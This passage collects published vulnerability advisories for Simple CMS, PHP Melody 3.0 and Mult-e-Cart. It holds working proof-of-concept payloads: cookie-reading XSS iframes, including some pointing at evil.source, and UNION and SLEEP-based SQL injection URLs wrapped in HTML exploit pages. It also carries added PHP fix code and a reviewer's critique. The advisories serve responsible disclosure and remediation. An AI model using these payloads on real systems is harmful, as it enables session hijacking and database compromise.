[+] password
Affected Module(s):
[+] Users (act=users) (Backend)
Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote attackers with privileged account and without user interaction.
For security demonstration or to reproduce the sql injection vulnerability follow the provided information and steps below to continue.
PoC: Example
act=addUser&name=[ADD EXISTING DEFAULT VALUE!]&email=test@test.de&username=[ADD EXISTING DEFAULT VALUE!]&password=[ADD EXISTING DEFAULT VALUE!]&submit=Add User
PoC: Exploitation
act=addUser&name=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&password=a-1'&submit=Add User
--- PoC Session Logs (POST) ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&password=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 1224
content-type: text/html; charset=UTF-8
--- SQL Error Exception Logs ---
Error: SELECT * FROM cms2_users WHERE username='a%20-1'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%20-1'' at line 1
Solution - Fix & Patch:
=======================
1. Disallow SQL errors from being displayed in the frontend and backend. Do not re-display the broken or malicious query on the client side.
2. Use prepared statements to protect the SQL query built from the POST request.
3. Restrict the POST parameters by disallowing special characters such as single or double quotes.
4. Set up a filter or validation class to deny broken or manipulated SQL queries.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

# Exploit Title: PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-10-20
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
# Version: v3
# Tested on: Linux
Document Title:
===============
PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2290
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
Release Date:
=============
2021-10-20
Vulnerability Laboratory ID (VL-ID):
====================================
2290
Common Vulnerability Scoring System:
====================================
5
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting vulnerabilities in the PHP Melody v3.0 video cms web-application.
Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple non-persistent cross site scripting web vulnerabilities have been discovered in the official PHP Melody v3.0 video CMS web application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector to compromise
browser-to-web-application requests on the client side.
The cross site scripting vulnerabilities are located in the `moved`, `username` and `keyword` parameters of the `categories.php`, `import.php`
and `import-user.php` files. The injection point is located in the GET method request and the execution occurs with a non-persistent attack vector
in the status message or exception output of the admin panel UI.
Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious sources and non-persistent manipulation of affected application modules.
Request Method(s):
[+] GET
Vulnerable File(s):
[+] categories.php
[+] import-user.php
[+] import.php
Vulnerable Parameter(s):
[+] move
[+] username
[+] keyword
Affected Module(s):
[+] Status Message & Exception
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
PoC: Payload
%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
PoC: Exploitation
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
-
https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E
&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
-
https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4
PoC: Exploit
<html>
<head>
<title>PHP Melody v3.0 - XSS PoC Exploit</title>
</head>
<body>
#1
<iframe src="https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E" width="200" height="200"> </iframe>
#2
<iframe src="https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1" width="200" height="200"> </iframe>
#3
<iframe src="https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4" width="200" height="200"> </iframe>
</body>
</html>
--- PoC Session Logs (GET) (move) ---
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved="><iframe src=evil.source onload=alert(document.cookie)>
Host: phpmelody.localhost.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.4.34
--- PoC Session Logs (GET) (username) ---
https://phpmelody.localhost:8080/admin/import-user.php?action=search&username="><iframe src=evil.source onload=alert(document.cookie)>&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
Host: phpmelody.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.4.34
Vulnerable Source: Categories.php (type=genre&id=1&moved)
<div class="alert alert-success alert-styled-left"><button type="button" class="close" data-dismiss="alert"
aria-label="Close"><span aria-hidden="true">×</span></button>
Category<strong>Film & animation</strong> moved "><iframe src="evil.source" onload="alert(document.cookie)"> a level.</div>
<div id="display_result" style="display:none;"></div>
Vulnerable Source: Import Videos from User (action=search&username)
<div class="card">
<div class="card-body">
<h5 class="mb-3">Username</h5>
<div class="d-block">
<form name="import-user-search-form" id="import-user-search-form" action="" method="post" class="">
<div class="input-group mb-3">
<div class="form-group-feedback form-group-feedback-left">
<input name="username" type="text" class="form-control form-control-lg alpha-grey gautocomplete" value=""><iframe src="evil.source" onload="alert(document.cookie)">"
placeholder="Enter username or Channel ID" autocomplete="yt-username" />
<div class="form-control-feedback form-control-feedback-lg">
<i class="icon-search4 text-muted"></i>
</div></div>
<div class="input-group-append">
<select name="data_source" class="form-field alpha-grey custom-select custom-select-lg">
<option value="youtube" selected="selected">Youtube User</option>
<option value="youtube-channel" >Youtube Channel</option>
<option value="dailymotion" >Dailymotion User</option>
<option value="vimeo" >Vimeo User</option>
</select></div>
<div class="input-group-append">
<button type="submit" name="submit" class="btn btn-primary btn-lg" id="search-user-btn">Search</button>
</div></div>
Reference(s):
https://phpmelody.localhost.com:8080/admin/
https://phpmelody.localhost.com:8080/admin/import.php
https://phpmelody.localhost.com:8080/admin/categories.php
https://phpmelody.localhost.com:8080/admin/import-user.php
Solution - Fix & Patch:
=======================
The vulnerabilities can be resolved by the following steps:
1. Encode, escape or filter the vulnerable move, keyword and username parameters in the GET method requests
2. Restrict all the transmitted parameters by disallowing the usage of special characters
3. Sanitize the status message and error message output to remove the execution points
4. Alternatively, set up security headers and a web application firewall or filter to prevent further exploitation
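As an added example (not code from the PHP Melody or Simple CMS projects), the following PHP shows the fix both XSS advisories above call for, applied at the output points they describe: the Simple CMS user-list table cells, and the PHP Melody "moved" status message and the username input's value attribute. The allow-list for `moved`, the CSP values and the field names are assumptions for this demo.

```php
<?php
// Added example, not PHP Melody or Simple CMS project code. Both XSS
// advisories above share one shape: a request or stored value reaches HTML
// output unencoded (Simple CMS: the user-list table cells; PHP Melody: the
// "moved" status message and the username input's value attribute). The fix
// is encoding at each output point for its context. The allow-list for
// "moved" and the CSP values are assumptions for this demo.
declare(strict_types=1);

// Encoding for HTML text and double-quoted attributes. ENT_QUOTES neutralises
// the closing quote in value="...", ENT_SUBSTITUTE keeps malformed UTF-8 from
// turning into an empty string that would silently drop the value.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// categories.php: "moved" has only two legitimate values (assumed: up/down),
// so anything else is rejected before it can reach the status message.
function move_direction(array $get): ?string
{
    $v = $get['moved'] ?? null;
    return (is_string($v) && in_array($v, ['up', 'down'], true)) ? $v : null;
}

function category_moved_alert(string $categoryName, array $get): string
{
    $dir = move_direction($get);
    if ($dir === null) {
        return '<div class="alert alert-danger">Invalid move request.</div>';
    }
    return '<div class="alert alert-success">Category <strong>' . h($categoryName)
        . '</strong> moved ' . h($dir) . ' a level.</div>';
}

// import-user.php: the search term is reflected into an input's value
// attribute; with h() the closing quote and angle brackets of a probe become
// literal text inside the attribute instead of new markup.
function username_search_field(array $get): string
{
    $username = $get['username'] ?? '';
    $username = is_string($username) ? $username : '';
    return '<input name="username" type="text" class="form-control" value="'
        . h($username) . '" placeholder="Enter username or Channel ID">';
}

// admin.php?act=users (Simple CMS): stored columns are encoded when the row is
// rendered. Filtering on the way into the database is not a substitute.
function user_row(array $user): string
{
    $cells = '';
    foreach (['name', 'email', 'username'] as $col) {
        $cells .= '<td class="bodylist">' . h((string)($user[$col] ?? '')) . '</td>';
    }
    return '<tr>' . $cells . '</tr>';
}

// Defence in depth (step 4 of the fix list): a CSP without 'unsafe-inline'
// means a missed encoding point yields broken markup rather than script
// execution. In a real handler send these with header() before any output.
function security_headers(): array
{
    return [
        'Content-Security-Policy' => "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'",
        'X-Content-Type-Options'  => 'nosniff',
    ];
}

// Demo with a constructed probe modelled on the advisories' payload shape.
$probe = '"><iframe src=a onload=alert(1)>';
echo category_moved_alert('Film & animation', ['moved' => $probe]), PHP_EOL;
echo category_moved_alert('Film & animation', ['moved' => 'up']), PHP_EOL;
echo username_search_field(['username' => $probe]), PHP_EOL;
echo user_row(['name' => 'c' . $probe, 'email' => 'user@example.test', 'username' => 'd' . $probe]), PHP_EOL;
foreach (security_headers() as $name => $value) {
    echo $name, ': ', $value, PHP_EOL;
}
```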
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

# Exploit Title: PHP Melody 3.0 - 'vid' SQL Injection
# Date: 2021-10-20
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
# Version: v3
Document Title:
===============
PHP Melody v3.0 - (vid) SQL Injection Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2295
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
Release Date:
=============
2021-10-20
Vulnerability Laboratory ID (VL-ID):
====================================
2295
Common Vulnerability Scoring System:
====================================
7
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the PHP Melody v3.0 video cms web-application.
Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Full Authentication (Admin/Root Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A remote SQL injection vulnerability has been discovered in the PHP Melody v3.0 video CMS web application.
The vulnerability allows remote attackers to inject or execute their own SQL commands to compromise the DBMS or
file system of the web application.
The remote SQL injection vulnerability is located in the `vid` parameter of the `edit-video.php` file.
Remote attackers with moderator or admin access privileges are able to execute their own malicious SQL commands
by injecting into the GET method request. The vid parameter in the ACP UI is not sanitized properly, which allows an
attacker to inject SQL commands to compromise the web application and DBMS.
Exploitation of the remote SQL injection vulnerability requires no user interaction but a privileged moderator or admin account.
Successful exploitation of the remote SQL injection results in database management system, web server and web application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Video Edit
Vulnerable File(s):
[+] edit-video.php
Vulnerable Parameter(s):
[+] vid
Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by authenticated remote attackers without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Original:
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd&a=4&page=1&filter=added&fv=desc
PoC: Exploitation #1
https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
PoC: Exploitation #2
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--
PoC: Exploit
<html>
<head>
<title>phpmelody vid sql injection poc</title>
</head>
<body>
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"></iframe>
<br>
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--"></iframe>
</body>
</html>
Reference(s):
https://phpmelody.localhost:8000/
https://phpmelody.localhost:8000/admin/
https://phpmelody.localhost:8000/admin/edit-video.php
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following steps:
1. Use a prepared statement to build the query
2. Restrict the parameter input to disallow special characters
3. Escape and encode the content to prevent execution of malicious payloads
4. Alternatively, it is possible to integrate a web application firewall or filter class to block further attacks.
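As an added example (not code from either project), this PHP carries out the fix steps of both SQL injection advisories above, the Simple CMS addUser flow and the PHP Melody vid lookup: bound parameters, an allow-listed identifier shape, and driver errors kept out of the response. It runs offline on PDO with SQLite (pdo_sqlite assumed available); the table names, the duplicate-key handling and the vid format are assumptions modelled on the advisories.

```php
<?php
// Added example, not Simple CMS or PHP Melody project code. The two SQL
// injection advisories above share their root causes: request values
// concatenated into SQL, and (Simple CMS) the raw driver error with the failed
// query echoed to the client. PDO with an in-memory SQLite database is used so
// this runs offline; with pdo_mysql only the DSN changes. Table and column
// names and the vid format are assumptions modelled on the advisories.
declare(strict_types=1);

function connect(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    // Errors become exceptions, so a failed query can never fall through and
    // be rendered as a status message.
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE cms2_users (id INTEGER PRIMARY KEY, name TEXT NOT NULL,
                email TEXT NOT NULL UNIQUE, username TEXT NOT NULL UNIQUE, password TEXT NOT NULL)');
    $pdo->exec('CREATE TABLE videos (vid TEXT PRIMARY KEY, title TEXT NOT NULL)');
    $pdo->exec("INSERT INTO videos (vid, title) VALUES ('3435b47dd', 'demo clip')");
    return $pdo;
}

// Fix step 1 (Simple CMS): the driver message and the failed query go to the
// server log only; the client gets a fixed, generic message.
function db_failure(PDOException $e, string $context): string
{
    error_log(sprintf('[db] %s failed: %s', $context, $e->getMessage()));
    return 'The request could not be processed.';
}

// admin.php?act=addUser: bound parameters, and a duplicate e-mail/username is a
// normal outcome reported in fixed words, not an exception leaked to the page.
function add_user(PDO $pdo, array $post): array
{
    foreach (['name', 'email', 'username', 'password'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field]) || $post[$field] === '') {
            return ['ok' => false, 'message' => 'All fields are required.'];
        }
    }
    if (filter_var($post['email'], FILTER_VALIDATE_EMAIL) === false) {
        return ['ok' => false, 'message' => 'Invalid e-mail address.'];
    }
    try {
        $stmt = $pdo->prepare('INSERT INTO cms2_users (name, email, username, password)
                               VALUES (:name, :email, :username, :password)');
        $stmt->execute([
            ':name'     => $post['name'],
            ':email'    => $post['email'],
            ':username' => $post['username'],
            ':password' => password_hash($post['password'], PASSWORD_DEFAULT),
        ]);
        return ['ok' => true, 'message' => 'User added.'];
    } catch (PDOException $e) {
        // SQLSTATE 23000 is an integrity-constraint violation (duplicate UNIQUE
        // key) on MySQL/MariaDB and SQLite alike.
        if (($e->errorInfo[0] ?? null) === '23000') {
            return ['ok' => false, 'message' => 'A user with that e-mail or username already exists.'];
        }
        return ['ok' => false, 'message' => db_failure($e, 'addUser')];
    }
}

// admin/edit-video.php?vid=...: allow-list the identifier's shape before it
// reaches the database, then bind it. A value containing a quote, a space or
// an SQL keyword fails the regex and never becomes part of a query.
function load_video(PDO $pdo, string $vid): ?array
{
    if (preg_match('/\A[a-z0-9]{6,16}\z/', $vid) !== 1) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT vid, title FROM videos WHERE vid = :vid');
    $stmt->execute([':vid' => $vid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demo with constructed request values. The second add_user call repeats the
// first, which is the collision the Simple CMS advisory describes.
$pdo  = connect();
$user = ['name' => 'admin', 'email' => 'admin@example.test', 'username' => 'admin', 'password' => 'demo'];
echo add_user($pdo, $user)['message'], PHP_EOL;
echo add_user($pdo, $user)['message'], PHP_EOL;
echo json_encode(load_video($pdo, '3435b47dd')), PHP_EOL;
echo json_encode(load_video($pdo, "-3435b47dd' UNION ALL SELECT NULL--")), PHP_EOL;
```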
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

# Exploit Title: PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)
# Date: 2021-10-21
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
Document Title:
===============
PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2291
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
Release Date:
=============
2021-10-21
Vulnerability Laboratory ID (VL-ID):
====================================
2291
Common Vulnerability Scoring System:
====================================
5.4
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the PHP Melody v3.0 video cms web-application.
Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in PHP Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to
compromise browser to web-application requests from the application-side.
The persistent cross site web vulnerability is located in the video editor (WYSIWYG) with the tinymce class.
Privileged user accounts like edtiors are able to inject own malicious script code via editor to provoke a
public execution by users oder administrators. The request method to inject is get and after save in dbms
via post method the attack vector becomes persistent.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Editor - Videos (WYSIWYG - tinymce)
Vulnerable File(s):
[+] edit-episode.php
Vulnerable Parameter(s):
[+] episode_id
Affected Module(s):
[+] description
Proof of Concept (PoC):
=======================
The persistent validation vulnerability can be exploited by remote attackers with privileged editor user account and with low user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.
PoC: Payload
<p><a title=""><iframe src="//phpmelody.localhost.com:8080/admin/[PWND]">">">"
href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p>
--- PoC Session Logss (GET) [WYSIWYG] ---
https://phpmelody.localhost.com:8080/admin/[PWND]
Host: phpmelody.localhost.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
Cookie: PHPSESSID=aac20732ffd23b7d11815fa2b8f2e12a; melody_d900e07810ba03257e53baf46a9ada6f=admin;
melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNw%3D%3D;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html;
vary: Accept-Encoding
Vulnerable Source: Video Editor (WYSIWYG - tinymce)
<textarea name="description" cols="100" id="textarea-WYSIWYG" class="tinymce" style="display: none;"
aria-hidden="true"><p><test title=""><iframe src="//phpmelody.localhost.com:8080/admin/evil.source">">">"
href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p></textarea>
<span class="autosave-message"></span>
</div></div>
Reference(s):
https://phpmelody.localhost.com:8080/admin/
https://phpmelody.localhost.com:8080/admin/edit-episode.php
https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
Solution - Fix & Patch:
=======================
Encode and sanitize the input description parameter of the web editor tinymce class for moderators, editors or users to prevent attacks.
Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
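Review bot: the Vulnerable Parameter(s) entry `[+] episode_id` names the record selector rather than the field that carries the inject; the vulnerable source shows the payload stored in `<textarea name="description" ... class="tinymce">` and the fix paragraph itself targets the description parameter, so the list should read `[+] description` (episode_id only selects which episode edit-episode.php loads). Request Method(s) lists only POST, while the description says the inject is submitted via GET and persisted via POST and the only session log shown is the GET; listing both methods, or adding the POST that saves the description, would make the write-up consistent. The payload line and the vulnerable-source line also differ (`<a title="">` versus `<test title="">`, both closed by `</a>`), so one of the two is not what was actually saved.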

@ -0,0 +1,264 @@
# Exploit Title: Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection
# Date: 2021-10-22
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://multecart.com/
# Version: 2.4
Document Title:
===============
Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2306
Release Date:
=============
2021-10-22
Vulnerability Laboratory ID (VL-ID):
====================================
2306
Common Vulnerability Scoring System:
====================================
7
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Digital Multivendor Marketplace Online Store - eShop CMS
(Source: https://ultimate.multecart.com/ & https://www.techraft.in/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
Affected Product(s):
====================
Techraft
Product: Digital Multivendor Marketplace Online Store v2.4 - eShop CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-10-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
